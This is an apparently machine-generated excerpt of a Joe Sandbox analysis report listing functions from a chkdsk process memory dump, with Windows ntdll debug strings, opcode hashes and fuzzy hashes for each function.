                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                    • API String ID: 0-3178619729
                                                                                                                    • Opcode ID: a4ee0bf87bd7d893cade07b1b189d7f612818713d771d5bb9eaec8eac6864403
                                                                                                                    • Instruction ID: 1fce9c559b25132a22f2e3f8a962f0f13f6f5a4a07ca14ab9d511e6527265fc2
                                                                                                                    • Opcode Fuzzy Hash: a4ee0bf87bd7d893cade07b1b189d7f612818713d771d5bb9eaec8eac6864403
                                                                                                                    • Instruction Fuzzy Hash: F1E1DE35A042499BDB29CF28C499B7ABBE2BF48324F14885DEDD6CB245E734ED44CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0587F4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • RTL: Re-Waiting, xrefs: 058C0128
                                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 058C00C7
                                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 058C00F1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                    • API String ID: 0-2474120054
                                                                                                                    • Opcode ID: 04d895cb54281b968ebce8443063b2678b423be182ac46ac5585f51edf63f2a2
                                                                                                                    • Instruction ID: 693746999223d6f346724dd07a51b3212b3125975ca71c66fe994fc0010e6200
                                                                                                                    • Opcode Fuzzy Hash: 04d895cb54281b968ebce8443063b2678b423be182ac46ac5585f51edf63f2a2
                                                                                                                    • Instruction Fuzzy Hash: 8BE18D70608745DFD725CF29C888B2ABBE2BB44358F140A5DFAA6CB2A1D774DD44CB42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0585B5E0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                    • API String ID: 0-1145731471
                                                                                                                    • Opcode ID: 3e315af9bf3051488514721317be9f3caf62b1e07c9eaa3f85761e1b7d1a5b1c
                                                                                                                    • Instruction ID: 263bf74f5c2c559e1a460a65803226d5f30fa91f545a8c90ee13bc755b85d5bc
                                                                                                                    • Opcode Fuzzy Hash: 3e315af9bf3051488514721317be9f3caf62b1e07c9eaa3f85761e1b7d1a5b1c
                                                                                                                    • Instruction Fuzzy Hash: 7AB1AF71A046089FDB25CF68C990BAEB7BABF55724F148929EC52DB790DB70EC44CB00
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058D330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                    • API String ID: 0-2391371766
                                                                                                                    • Opcode ID: 6cbf1186645e3471c01daeaca6d1d0b543d66f9997395c532fa61d85bfadb3df
                                                                                                                    • Instruction ID: 3b478312ce3178a5bd1523b8f4de7b13941f9e962c7d7477cf970fad08da2465
                                                                                                                    • Opcode Fuzzy Hash: 6cbf1186645e3471c01daeaca6d1d0b543d66f9997395c532fa61d85bfadb3df
                                                                                                                    • Instruction Fuzzy Hash: 53B17BB1618305AFE722DE58D885F6BB7E9BB44714F040929FE41DB290DB75EC048BA3
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0584A147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                    • API String ID: 2994545307-2779062949
                                                                                                                    • Opcode ID: 8af724545f55270d67d3c598c93b0a9bdf181f73f00655acba98da25f2946598
                                                                                                                    • Instruction ID: da751527620ed62fc87e0b56e3bcc9244ed5fbda16e432850e2e99d0a648eb9d
                                                                                                                    • Opcode Fuzzy Hash: 8af724545f55270d67d3c598c93b0a9bdf181f73f00655acba98da25f2946598
                                                                                                                    • Instruction Fuzzy Hash: 67A15E72A016299ADF31EB24CC88BAAB7B9FF04714F1005EAED09E7250D7359E84CF51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05879723 Relevance: 3.9, Strings: 3, Instructions: 179COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                    • API String ID: 0-2283098728
                                                                                                                    • Opcode ID: 7d565f0a1e9b7d88f009018fce30e33148439f3b18fe785391c73ff8b50dd66b
                                                                                                                    • Instruction ID: f18169c5b1681d986398a2042e7b1a802dbe1f6e95e02188b56e25737dcf6dac
                                                                                                                    • Opcode Fuzzy Hash: 7d565f0a1e9b7d88f009018fce30e33148439f3b18fe785391c73ff8b50dd66b
                                                                                                                    • Instruction Fuzzy Hash: EE51E1707043099BD724EF38C88AF2A77A6BB85714F14066DEC56D7691EB70DC40CB82
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0584F75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 058AE455
                                                                                                                    • HEAP[%wZ]: , xrefs: 058AE435
                                                                                                                    • HEAP: , xrefs: 058AE442
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                    • API String ID: 0-1340214556
                                                                                                                    • Opcode ID: cca68168c1349b3fc10d18ed053d32ce9ee3aefc2508313eb298f442fcaeb7a5
                                                                                                                    • Instruction ID: 1dc356afd81b6d5227f45ebeebc7a57be05327789c7c90e7bd216545126563b3
                                                                                                                    • Opcode Fuzzy Hash: cca68168c1349b3fc10d18ed053d32ce9ee3aefc2508313eb298f442fcaeb7a5
                                                                                                                    • Instruction Fuzzy Hash: 1F51B032604688AFE721DB68C899F6ABBE9FF04604F0444A9EE41CB792D774ED40CB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05871514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • LdrpCompleteMapModule, xrefs: 058BA39D
                                                                                                                    • minkernel\ntdll\ldrmap.c, xrefs: 058BA3A7
                                                                                                                    • Could not validate the crypto signature for DLL %wZ, xrefs: 058BA396
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                    • API String ID: 0-1676968949
                                                                                                                    • Opcode ID: d911c15db052fe3b716009b87542403a116fde42282085569b0df203a2626679
                                                                                                                    • Instruction ID: 264c8ab2fd2fe9988838ea02fba5e7aba77ad0d9ce44e6b0f212fadc2d994c35
                                                                                                                    • Opcode Fuzzy Hash: d911c15db052fe3b716009b87542403a116fde42282085569b0df203a2626679
                                                                                                                    • Instruction Fuzzy Hash: 2C51F330A047499BE729CA6CC94CB6A7BE9BB04724F140694EC52DBBD1DB74ED40CB41
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058FD62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • HEAP[%wZ]: , xrefs: 058FD792
                                                                                                                    • Heap block at %p modified at %p past requested size of %Ix, xrefs: 058FD7B2
                                                                                                                    • HEAP: , xrefs: 058FD79F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                    • API String ID: 0-3815128232
                                                                                                                    • Opcode ID: 7a331fc2f8bb1289ed8310293a3fa35735dda2b6b1c8c64f020f9f3f063b425b
                                                                                                                    • Instruction ID: e383c9a28b83b2a8387bb7da4877bdb54325c7b533cceeab76ede0b5efb23979
                                                                                                                    • Opcode Fuzzy Hash: 7a331fc2f8bb1289ed8310293a3fa35735dda2b6b1c8c64f020f9f3f063b425b
                                                                                                                    • Instruction Fuzzy Hash: 485138351062548AE765CB29C84477277E2EF4D249F148849EFC7CF285E63ADC43DBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0588C640 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 058C80F3
                                                                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 058C80E9
                                                                                                                    • Failed to reallocate the system dirs string !, xrefs: 058C80E2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                    • API String ID: 0-1783798831
                                                                                                                    • Opcode ID: 33e5290d1e2d666f186fe0ab643e91d0c7cecc82e9ac847b2698cc1bd4ca1876
                                                                                                                    • Instruction ID: 5036df8fd18afa53c9f95e0d946edb73858d949013ee159ec3156721a7f29299
                                                                                                                    • Opcode Fuzzy Hash: 33e5290d1e2d666f186fe0ab643e91d0c7cecc82e9ac847b2698cc1bd4ca1876
                                                                                                                    • Instruction Fuzzy Hash: 3B41AFB5658304ABC721EB68D94AF6B7BE9FB44614F00492EBC49D7250EB74DC00CBA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0584753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                    • API String ID: 0-1151232445
                                                                                                                    • Opcode ID: d5b1550984ee28effa63f1584f5895e31c76988f0356ae016d71ac20c7db75d7
                                                                                                                    • Instruction ID: 464cfbcdb4f4720c908caeb58ae424f8b05cd3194d3e9a29650a889021f757a4
                                                                                                                    • Opcode Fuzzy Hash: d5b1550984ee28effa63f1584f5895e31c76988f0356ae016d71ac20c7db75d7
                                                                                                                    • Instruction Fuzzy Hash: 1C41C4352442C89FEF29CA2CC494B757BD2EF01209F2844A9DC86CBA56CB75DC86CF61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058815EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • minkernel\ntdll\ldrtls.c, xrefs: 058C1954
                                                                                                                    • LdrpAllocateTls, xrefs: 058C194A
                                                                                                                    • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 058C1943
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                    • API String ID: 0-4274184382
                                                                                                                    • Opcode ID: fb311db7e562acf7a8b1145bcf684537ef57ce32397abe6a224f328443dd3067
                                                                                                                    • Instruction ID: d4c3d94b6a55852e5870c6dd28db6d178ca0b10f485394ae5cefc01b76f04552
                                                                                                                    • Opcode Fuzzy Hash: fb311db7e562acf7a8b1145bcf684537ef57ce32397abe6a224f328443dd3067
                                                                                                                    • Instruction Fuzzy Hash: 84414975A04705AFDB15DFA8C88ABAEBBB5FF48310F048559E806E7251DB35AC01CB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058D43D5 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 058D4508
                                                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 058D4519
                                                                                                                    • LdrpCheckRedirection, xrefs: 058D450F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                    • API String ID: 0-3154609507
                                                                                                                    • Opcode ID: 36e7736d0bae95e7fcb5094a3aeb561f355681dd67d8dc3b31b16ae98451ab1b
                                                                                                                    • Instruction ID: ddfcff5350ba97b73729434d58882c150cfc86c3bd897503de3f6f9fb0b20c0d
                                                                                                                    • Opcode Fuzzy Hash: 36e7736d0bae95e7fcb5094a3aeb561f355681dd67d8dc3b31b16ae98451ab1b
                                                                                                                    • Instruction Fuzzy Hash: 1941D13260A3119BCF20DF58D940E36FBE6BF48654B090659EC99D7365E7B0DC80CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05881527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • LdrpInitializeTls, xrefs: 058C1851
                                                                                                                    • DLL "%wZ" has TLS information at %p, xrefs: 058C184A
                                                                                                                    • minkernel\ntdll\ldrtls.c, xrefs: 058C185B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                    • API String ID: 0-931879808
                                                                                                                    • Opcode ID: f9b07b1c0eed2799d8034c9a4f11c77896ba061366aa92a96e86485149fb286d
                                                                                                                    • Instruction ID: 590eeb300d54ead0a1171647b544dd4587db2ea4d534845801ad7b12a62fcf81
                                                                                                                    • Opcode Fuzzy Hash: f9b07b1c0eed2799d8034c9a4f11c77896ba061366aa92a96e86485149fb286d
                                                                                                                    • Instruction Fuzzy Hash: 1231A471B14304ABD720EB98C88AF7A7AA9FB41755F020469FD06E7180EF70AD45CB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05891190 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • @, xrefs: 058911C5
                                                                                                                    • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0589119B
                                                                                                                    • BuildLabEx, xrefs: 0589122F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                    • API String ID: 0-3051831665
                                                                                                                    • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                    • Instruction ID: 3c3838689e8349775352b677b93bce648e7432d7eb8e833e53a3e8268bd45106
                                                                                                                    • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                    • Instruction Fuzzy Hash: A7317076A0421ABBDF16EB99CC48EAEBBB9EB84754F044025ED05E7260D730DE05CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058651C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @$@
                                                                                                                    • API String ID: 0-149943524
                                                                                                                    • Opcode ID: 360a337fe5c0189cf5eab9877455a30f6b8609044bea2f21a727efe3d49924b6
                                                                                                                    • Instruction ID: f3a12bf868c469f71ff41cf3c8f607800a18c4a9cb20fd71a1498a9af25c58c7
                                                                                                                    • Opcode Fuzzy Hash: 360a337fe5c0189cf5eab9877455a30f6b8609044bea2f21a727efe3d49924b6
                                                                                                                    • Instruction Fuzzy Hash: E5328AB06083518BDB24CF19C498B7AB7E6BF88704F94492EED96C7290E774DD44CB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058D174B Relevance: 2.8, Strings: 2, Instructions: 278COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @$AddD
                                                                                                                    • API String ID: 0-2525844869
                                                                                                                    • Opcode ID: f94d57951f56f743e6bea0eff0a389ba8490ad1dd5d8a37c9cd07aacd5a985a3
                                                                                                                    • Instruction ID: 919d5fcf0282a78b8a3b990173ccc7ceda2d9bc583fff9dc7237ecc61ff383df
                                                                                                                    • Opcode Fuzzy Hash: f94d57951f56f743e6bea0eff0a389ba8490ad1dd5d8a37c9cd07aacd5a985a3
                                                                                                                    • Instruction Fuzzy Hash: B2A12476208344AFE315CB14C889BABF7E9BF84714F144A2EF995C6254E770EE05CB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0592B55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 0592B5C4
                                                                                                                    • RedirectedKey, xrefs: 0592B60E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                                    • API String ID: 0-1388552009
                                                                                                                    • Opcode ID: 07ab42f4f36dcb4695f7de137c21c3ec3ee1d9416f7a61ebd06e1d755eccba5b
                                                                                                                    • Instruction ID: a68a5042efdd2bbe36ffcabcfc28581586dcdf8e85690b20aaef3bf90deddf84
                                                                                                                    • Opcode Fuzzy Hash: 07ab42f4f36dcb4695f7de137c21c3ec3ee1d9416f7a61ebd06e1d755eccba5b
                                                                                                                    • Instruction Fuzzy Hash: C06103B5911229ABCB21DF95C848ADEBFBDFB08710F54801AF805E7204DB349A45CFA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0586F640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $$$
                                                                                                                    • API String ID: 0-233714265
                                                                                                                    • Opcode ID: 23bff923611a527731422f74fe2cd065a1239d5ed4f038d97cde253b523dc59b
                                                                                                                    • Instruction ID: 298cb08930dbcc7e57067766231a9534cfc5395507d96fc786c41e1efc15b408
                                                                                                                    • Opcode Fuzzy Hash: 23bff923611a527731422f74fe2cd065a1239d5ed4f038d97cde253b523dc59b
